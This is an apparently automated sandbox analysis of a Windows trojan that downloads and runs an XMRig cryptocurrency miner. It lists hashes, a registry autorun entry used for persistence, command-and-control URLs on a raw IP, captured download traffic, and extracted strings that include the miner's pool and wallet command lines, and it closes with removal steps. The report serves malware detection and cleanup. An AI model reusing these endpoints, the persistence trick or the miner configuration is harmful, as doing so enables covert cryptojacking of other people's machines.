MD5: 0b9503915a84cf8728bdf893cdf29550
SHA1: 73145018b075c896ddd78f4adc0448090c1e822a
SHA256: 4e66c34d2cd851494a4f2b3e7357b57a1b8a2fe37ea06446407345add0da5fcc
SSDeep: 1536:xNzKkrnvBzC1gObQBpEEW4QpuNQYS3W33Jk5nwKvxPPis86JFJ8JMpczaVPyOoWi:jJzAgOMK6uXm8nvRioJ8epczaVPeWN
Size: 154112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-21 13:08:57
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1504

The Trojan injects its code into the following process(es):

%original file name%.exe:2692

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\MicroMon\curl.exe (55375 bytes)

Registry activity

The process %original file name%.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"FileDirectory" = "%windir%\tracing"

"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Security Server" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://95.46.8.51/panel/mr/curl.exe
hxxp://95.46.8.51/panel/gate.php?machine_id=e7568090100326&x64=False&version=1&video_card=VMware SVGA 3D (Microsoft Corporation - WDDM)&cpu=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&junk=11/10/2017 6:04:02 PM
hxxp://95.46.8.51/panel/set.php
dns.msftncsi.com
xmr-eu1.nanopool.org

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
ET TROJAN Generic gate

Traffic

GET /panel/mr/curl.exe HTTP/1.1

Host: 95.46.8.51

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 10 Nov 2017 16:04:00 GMT

Server: Apache/2.4.7 (Ubuntu)

Last-Modified: Thu, 28 Sep 2017 16:27:37 GMT

ETag: "adc00-55a4262e3f040"

Accept-Ranges: bytes

Content-Length: 711680

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......Y
.................J...................`....@..........................`
......$......... ..................................".......C..........
................................................................|.....
...........................text....H.......J..................`.P`.dat
a...|....`.......N..............@.`..rdata..$....p.......R............
..@.`@.eh_fram.G...P...H...(..............@.0@.bss....`...............
..............`..idata...".......$...p..............@.0..CRT....8.....
......................@.0..tls.... ...........................@.0..rsr
c....C.......C..................@.0...................................
......................................................................
......................................................................
......................................................................
................................................&......'.......1.f.=..
@.MZ....J.........J.........J.........J.....th...J....J...tJ..$.......
....$...........(.J..0.J..4.J..l.J.........=.aH..tm1.......&......$...
........f...<.@.....@.PE......@.u...Q.f....t?f......j............].
........1.......K....v...$..F......1......yt...,.........1...........f
...,...J..D$...J..D$...J..D$...J...$..J....J...aH..D$........,.f.U1...
.....WV.U.S....|...0..../...)..D$...........@......@......@......@....
..@......@......@.........5..J.........d.....1..x..5..J...9...3...
<<< skipped >>>

GET /panel/gate.php?machine_id=e7568090100326&x64=False&version=1&video_card=VMware SVGA 3D (Microsoft Corporation - WDDM)&cpu=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&junk=11/10/2017 6:04:02 PM HTTP/1.1

Host: 95.46.8.51

HTTP/1.1 200 OK

Date: Fri, 10 Nov 2017 16:04:02 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.22

Content-Length: 0

Content-Type: text/html
....


GET /panel/set.php HTTP/1.1

Host: 95.46.8.51

HTTP/1.1 200 OK

Date: Fri, 10 Nov 2017 16:04:02 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.22

Content-Length: 26

Content-Type: text/html
0 hXXp://server/exe updateHTTP/1.1 200 OK..Date: Fri, 10 Nov 2017 16:0
4:02 GMT..Server: Apache/2.4.7 (Ubuntu)..X-Powered-By: PHP/5.5.9-1ubun
tu4.22..Content-Length: 26..Content-Type: text/html..0 hXXp://server/e
xe update..

The Trojan connects to the servers at the folowing location(s):

.text

`.rsrc

@.reloc

v2.0.50727

System.Management

.ctor

WebClient

System.Net

System.IO

System.Threading

System.Reflection

System.IO.Compression

System.Diagnostics

System.Text

System.Security.Cryptography

WebRequest

RegistryKey

Microsoft.Win32

WebResponse

System.Globalization

OpenSubKey

System.Windows.Forms

get_ExecutablePath

set_WindowStyle

ProcessWindowStyle

CreateSubKey

GetExecutingAssembly

ARMsvc.exe

kernel32.dll

ntdll.dll

System.Collections.Generic

.cctor

System.Reflection.Emit

System.Runtime.CompilerServices

ContainsKey

System.Runtime.InteropServices

ProcessHandle

$6c748bd1-7967-470a-a0f9-d97429a03c9f

1.0.0.0

Confuser v1.9.0.0

_CorExeMain

mscoree.dll

<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

hXXp://95.46.8.51/panel/gate.php

hXXp://95.46.8.51/panel/mr/audiodg.exe

hXXp://95.46.8.51/panel/mr/conhost.exe

hXXp://95.46.8.51/panel/mr/blake256.cl

hXXp://95.46.8.51/panel/mr/curl.exe

-o xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuf86m5hFZcERFLNuv.1 -p x -t 4 --donate-level=1

--blake256 -o hXXp://dcr.pool.mn:4722 -u vlad12345123.user -p password

curl.exe

audiodg.exe

hXXp://95.46.8.51/panel/set.php

2.0.0

1.6.2.0

%original file name%.exe_2692_rwx_00352000_0000C000:

%SIj^

curl.exe_3740:

.text

P`.data

.rdata

`@.eh_fram

0@.bss

.idata

.rsrc

%UUUU

UUUU%UUUU

pipe

libgcc_s_dw2-1.dll

"%s" hash self-test failed.

[%d-d-d d:d:d]%s %s%s

[%d-d-d d:d:d]

[%s:%u] duplicate job received, ignore

{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}

[%s:%u] getaddrinfo error: "%s"

[%s:%u] error: "%s", code: %lld

[%s:%u] unsupported method: "%s"

[%s:%u] login error code: %d

[%s:%u] JSON decode failed: "%s"

[%s:%u] read error: "%s"

login

[%s:%u] connect error: "%s"

[%s:%u] DNS error: "%s"

[%s:%u] DNS error: "No IPv4 records found"

{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}

[01;36m%s:%d

[01;30m%s

use pool %s:%d %s

[01;37m%u

[31m"%s"

rejected (%lld/%lld) diff %u "%s" (%llu ms)

accepted (%lld/%lld) diff %u (%llu ms)

[01;37m%s:%d

[01;37m%d

new job from %s:%d diff %d

fee.xmrig.com

stratum tcp://

.nicehash.com

XMRig 2.3.1

%d.%d.%d

libuv/%s

libjansson/%s

unable to open %s: %s

%s:%d: %s

%s: unsupported non-option argument '%s'

No pool URL supplied. Exiting.

userpass

-o, --url=URL URL of mining server

-O, --userpass=U:P username:password pair for mining server

-p, --pass=PASSWORD password for mining server

-k, --keepalive send keepalived for prevent timeout (need pool support)

--no-huge-pages disable huge pages support

--nicehash enable nicehash support

--print-time=N print hashrate report every N seconds

[01;36mXMRig/%s

[01;37m libuv/%s%s

* VERSIONS: XMRig/%s libuv/%s%s

[01;36m%d

[01;37m, %s, av=%d, %sdonate=%d%%%s

* THREADS: %d, %s, av=%d, %sdonate=%d%%%s

gcc/%d.%d.%d

2.3.1

[01;37mHUGE PAGES: %s, %s

* HUGE PAGES: %s, %s

[01;37mCPU: %s (%d) %sx64 %sAES-NI

* CPU: %s (%d) %sx64 %sAES-NI

* POOL #%d: %s:%d

[01;37mPOOL #%d:

[01;36m%s:%d

[01;36m%s

[22;36m%s %s

[01;36m%s H/s

speed 2.5s/60s/15m %s %s %s H/s max: %s H/s

Huge pages support was successfully enabled, but reboot required to use it

%s/%s (Windows NT %lu.%lu

) libuv/%s

tX4Fr.rh.46Aw-wl-6

.eK9K\9.

\uX

\uX\uX

%s near '%s'

%s near end of file

unable to decode byte 0x%x

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

NUL byte in object key not supported

duplicate object key

[%c%c%c] %-8s %p

Unknown system error %d

EAFNOSUPPORT

EMSGSIZE

EPIPE

EPROTONOSUPPORT

ESPIPE

address family not supported

ai_family not supported

socket type not supported

operation canceled

illegal operation on a directory

socket operation on non-socket

operation not supported on socket

operation not permitted

broken pipe

protocol not supported

cannot send after transport endpoint shutdown

1.14.0

!loop->wq_async.async_sent

((uv_shutdown_t*) req)->handle->type == UV_NAMED_PIPE

%s: (%d) %s

(%d) %s

src/win/pipe.c

pipe->flags & UV_HANDLE_CONNECTION

pipe->u.fd == -1 || pipe->u.fd > 2

req->pipeHandle == INVALID_HANDLE_VALUE

req->pipeHandle != INVALID_HANDLE_VALUE

handle->type == UV_NAMED_PIPE

hThread == handle->pipe.conn.readfile_thread

req->write_buffer.base

!(handle->flags & UV_HANDLE_PIPESERVER)

pipe->type == UV_NAMED_PIPE

pipe->flags & UV_HANDLE_READ_PENDING

!(handle->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)

\\?\pipe\uv\%p-%lu

handle->pipe.serv.accept_reqs

handle->pipe.serv.accept_reqs[0].pipeHandle != INVALID_HANDLE_VALUE

avail >= sizeof(ipc_frame.header)

bytes == sizeof(ipc_frame.header)

ipc_frame.header.flags <= (UV_IPC_TCP_SERVER | UV_IPC_RAW_DATA | UV_IPC_TCP_CONNECTION)

avail - sizeof(ipc_frame.header) >= sizeof(ipc_frame.socket_info_ex)

bytes == sizeof(ipc_frame) - sizeof(ipc_frame.header)

handle->pipe.conn.remaining_ipc_rawdata_bytes >= bytes

handle->write_queue_size >= req->u.io.queued_bytes

handle->stream.conn.write_reqs_pending > 0

pipe->pipe.conn.eof_timer == NULL

!(pipe->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)

pipe->pipe.conn.ipc_pid != -1

rfds.fd_count == 1

rfds.fd_array[0] == handle->socket

wfds.fd_count == 1

wfds.fd_array[0] == handle->socket

efds.fd_count == 1

efds.fd_array[0] == handle->socket

!(options->flags & ~(UV_PROCESS_DETACHED | UV_PROCESS_SETGID | UV_PROCESS_SETUID | UV_PROCESS_WINDOWS_HIDE | UV_PROCESS_WINDOWS_VERBATIM_ARGUMENTS))

src/win/tcp.c

server->flags & UV_HANDLE_TCP_SINGLE_ACCEPT

handle->type == UV_TCP

(tcp)->activecnt >= 0

!((tcp)->flags & UV__HANDLE_CLOSING)

handle->tty.rd.read_line_buffer.base != NULL

handle->tty.rd.read_line_buffer.len > 0

handle->u.fd == -1 || handle->u.fd > 2

!(handle->flags & UV_HANDLE_TTY_READABLE) || handle->tty.rd.read_raw_wait == NULL

src/win/udp.c

handle->type == UV_UDP

handle->send_queue_size >= req->u.io.queued_bytes

len > 0 && len < ARRAY_SIZE(key_name)

_ntdll.dll

kernel32.dll

powrprof.dll

0.0.0.0

0123456789

%u.%u.%u.%u

fdopt.data.stream->type == UV_NAMED_PIPE

!(fdopt.data.stream->flags & UV_HANDLE_CONNECTION)

!(fdopt.data.stream->flags & UV_HANDLE_PIPESERVER)

mode == (PIPE_READMODE_BYTE | PIPE_WAIT)

0.4.0

operator

operator

global constructors keyed to

global destructors keyed to

operator""

_matherr(): %s in %s(%g, %g) (retval=%g)

VirtualQuery failed for %d bytes at address %p

VirtualProtect failed with code 0x%x

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

unknown option -- %s

unknown option -- %c

option requires an argument -- %s

option requires an argument -- %c

Error cleaning up spin_keys for thread

once %p is %d

T%p %d %s

T%p %d V=%0X H=%p %s

Assertion failed: (%s), file %s, line %d

RWL%p %d %s

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s

C%p %d %s

C%p %d V=%0X w=%ld %s

GCC: (Rev2, Built by MSYS2 project) 7.1.0

GCC: (Rev1, Built by MSYS2 project) 7.2.0

RegCloseKey

RegOpenKeyExW

ConnectNamedPipe

CreateIoCompletionPort

CreateNamedPipeA

CreateNamedPipeW

GetNamedPipeHandleStateA

PeekNamedPipe

SetNamedPipeHandleState

WaitNamedPipeW

_acmdln

_amsg_exit

MapVirtualKeyW

ADVAPI32.dll

IPHLPAPI.DLL

KERNEL32.dll

msvcrt.dll

PSAPI.DLL

USER32.dll

USERENV.dll

WS2_32.dll

<requestedExecutionLevel level="asInvoker"/>

<!--The ID below indicates application support for Windows Vista -->

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<!--The ID below indicates application support for Windows 7 -->

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<!--The ID below indicates application support for Windows 8 -->

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<!--The ID below indicates application support for Windows 8.1 -->

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<!--The ID below indicates application support for Windows 10 -->

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

ntdll.dll

Cadvapi32.dll

%s\%.*s

\\?\UNC\

eHARDWARE\DESCRIPTION\System\CentralProcessor\%d

File: %ws, Line %u

tmsvcrt.dll

VVV.xmrig.com

Copyright (C) 2016-2017 xmrig.com

xmrig.exe

conhost.exe_1004:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

%original file name%.exe_2692_rwx_00400000_00014000:

.text

`.rsrc

@.reloc

v2.0.50727

System.Management

.ctor

WebClient

System.Net

System.IO

System.Threading

System.Reflection

System.IO.Compression

System.Diagnostics

System.Text

System.Security.Cryptography

WebRequest

RegistryKey

Microsoft.Win32

WebResponse

System.Globalization

OpenSubKey

System.Windows.Forms

get_ExecutablePath

set_WindowStyle

ProcessWindowStyle

CreateSubKey

GetExecutingAssembly

ARMsvc.exe

kernel32.dll

ntdll.dll

System.Collections.Generic

.cctor

System.Reflection.Emit

System.Runtime.CompilerServices

ContainsKey

System.Runtime.InteropServices

ProcessHandle

$6c748bd1-7967-470a-a0f9-d97429a03c9f

1.0.0.0

Confuser v1.9.0.0

_CorExeMain

mscoree.dll

<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

hXXp://95.46.8.51/panel/gate.php

hXXp://95.46.8.51/panel/mr/audiodg.exe

hXXp://95.46.8.51/panel/mr/conhost.exe

hXXp://95.46.8.51/panel/mr/blake256.cl

hXXp://95.46.8.51/panel/mr/curl.exe

-o xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuf86m5hFZcERFLNuv.1 -p x -t 4 --donate-level=1

--blake256 -o hXXp://dcr.pool.mn:4722 -u vlad12345123.user -p password

curl.exe

audiodg.exe

hXXp://95.46.8.51/panel/set.php

2.0.0

1.6.2.0

%original file name%.exe_2692_rwx_00860000_00005000:

%8xn:

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1504

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Roaming\MicroMon\curl.exe (55375 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Windows Security Server" = "c:\%original file name%.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.